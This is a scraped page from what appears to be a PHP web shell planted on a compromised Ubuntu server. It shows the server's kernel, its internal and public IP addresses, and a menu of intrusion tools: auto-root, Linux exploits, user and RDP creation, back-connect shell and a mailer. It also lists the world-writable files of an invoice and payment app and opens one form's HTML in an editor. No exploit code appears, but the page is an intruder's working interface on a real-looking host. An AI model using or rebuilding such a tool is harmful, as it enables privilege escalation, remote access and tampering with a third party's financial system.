Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.189.143.150
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pms /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
addinvoice.html
19.23
KB
-rwxrwxrwx
approve.html
5.36
KB
-rw-rw-r--
bank.html
15.45
KB
-rwxrwxrwx
banklist.html
1.66
KB
-rwxrwxrwx
batchinfo.html
8.8
KB
-rwxrwxrwx
batchinfo_old.html
5.79
KB
-rw-rw-r--
changepassword.html
4.39
KB
-rwxrwxrwx
consultant.html
16.01
KB
-rwxrwxrwx
consultantlist.html
1.68
KB
-rwxrwxrwx
enterpayment.html
5.7
KB
-rw-rw-r--
excelapprove.html
8.11
KB
-rw-r--r--
invoice.html
2.72
KB
-rwxrwxrwx
invoice_bills_format.csv
236
B
-rw-rw-r--
makepayment.html
2.31
KB
-rwxrwxrwx
makepayment_old.html
7.72
KB
-rw-rw-r--
reportscreen.html
8.3
KB
-rw-r--r--
searchinvfet.html
18.1
KB
-rw-r--r--
searchpms.html
7.62
KB
-rw-r--r--
supplier.html
16.27
KB
-rwxrwxrwx
supplierlist.html
1.67
KB
-rwxrwxrwx
uploadexcel.html
6.62
KB
-rwxr-xr-x
users.html
8.35
KB
-rwxrwxrwx
userslist.html
1.75
KB
-rwxrwxrwx
verify.html
2.34
KB
-rw-rw-r--
verifyinvoice.html
18.09
KB
-rw-rw-r--
viewapprove.html
17.66
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : reportscreen.html
<style> .col-sm-3{ margin-bottom: 10px !important; } .card .col-sm-4{ margin-bottom: 4px !important; } .control-label .col-sm-1{ margin-bottom: 4px !important; } .col-sm-11{ margin-bottom: 0px !important; } .form-group .col-sm-12{ margin-bottom: -5px !important; } /* .control-label .col-sm-1{ margin-bottom: 5px !important; } */ .col-sm-8{ margin-bottom: 5px !important; } .col-sm-2{ margin-bottom: 5px !important; } .control-label{ font-size: 14px !important; } .col-sm-1.control-label{ margin-left: 14px; } .col-sm-6 { margin-bottom: 10px !important; } .col-sm-4{ margin-bottom: 10px !important; } </style> <div class="row clearfix"> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12"> <!-- <div class="header"> <div style="float: right"> <button style="margin-top: -20px" class="btn bg-primary waves-effect" onclick="genReport()" > Generate </button> </div> </div> --> <div class="body"> <div class="row clearfix"> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12" id="loadInvoice"> <div class="panel panel-primary" style="width: 1024px; margin-left: auto; margin-right: auto" > <div class="panel-heading">Reports <div style="float: right;margin: -5px;"> <button style="color: black;" class="btn " onclick="genReport()" > Generate </button> </div> <!-- <div style="float: right;margin: -5px;"> <button style="color: black;margin-right: 20px;" class="btn " onclick="loadbatchinfo()" > View </button> </div> --> </div> <table class="content-tbl" cellpadding="8" cellspacing="0" width="100%" style="margin-top: 15px;"> <tr> <td style="width: 15%;"> <div class="form-group"> <label class="control-label col-sm-1" for="enterbatchno" style="margin-bottom: 5px;width: 160px;" ><b>Report Type</b></label ></td> <td style="width: 1px;"> <select class="form-control2" id="reportType" style="width: 355px;margin-left: 10px;margin-bottom: 10px;" onchange="statonchangeinv()" > <option value="">--Select--</option> <option value="TDS">TDS Report</option> <option value="Batch">Batch Report</option> </select> </td> </div> </tr> <tr> <td style="width: 15%;"> <div class="form-group"> <label class="control-label col-sm-1" for="enterbatchno" style="margin-bottom: 5px;width: 160px;" ><b>Invoice Range</b></label ></td> <td style="width: 1px;"> <div class="col-sm-3" style="margin-left: -5px;"> <input type="invnofrom" class="form-control2" id="invnofrom" placeholder="From" value="0" maxlength="15" onblur="getinvto()" /> </div> <div class="col-sm-3" style="margin-left: -30px;"> <input type="invnoto" class="form-control2" id="invnoto" placeholder="To" value="ZZZZ" maxlength="15" /> </div> </td> </div> </tr> <tr> <td style="width: 15%;"> <div class="form-group"> <label class="control-label col-sm-1" for="enterbatchno" style="margin-bottom: 5px;width: 160px;" ><b>Batch Range</b></label ></td> <td style="width: 1px;"> <div class="col-sm-3" style="margin-left: -5px;"> <input type="batchfrom" class="form-control2" id="batchfrom" placeholder="From" value="0" maxlength="6" onblur="getbatchto()" /> </div> <div class="col-sm-3" style="margin-left: -30px;"> <input type="batchto" class="form-control2" id="batchto" placeholder="To" value="ZZZZ" maxlength="6" /> </div> </td> </div> </tr> <tr> <td> </td> </tr> </table> <div> <table id="entable" class="table table-bordered table-hover" hidden> <thead> <tr class="bg-primary"> <th width="4%"> <center>Sl. No.</center> </th> <th width="7%"> <center>Supplier Code</center> </th> <th width="15%"> <center>Supplier Name</center> </th> <th width="7%"> <center>Total Amount</center> </th> <th width="7%"> <center>TDS Amount</center> </th> <th width="7%"> <center>Payable Amount</center> </th> <th width="9%"> <center>UTR No.</center> </th> <th width="9%"> <center>UTR Date</center> </th> </tr> </thead> <tbody id="enterbatchnoinfotbody"></tbody> </table> </div> </div> </div> </div> </div> </div>
Close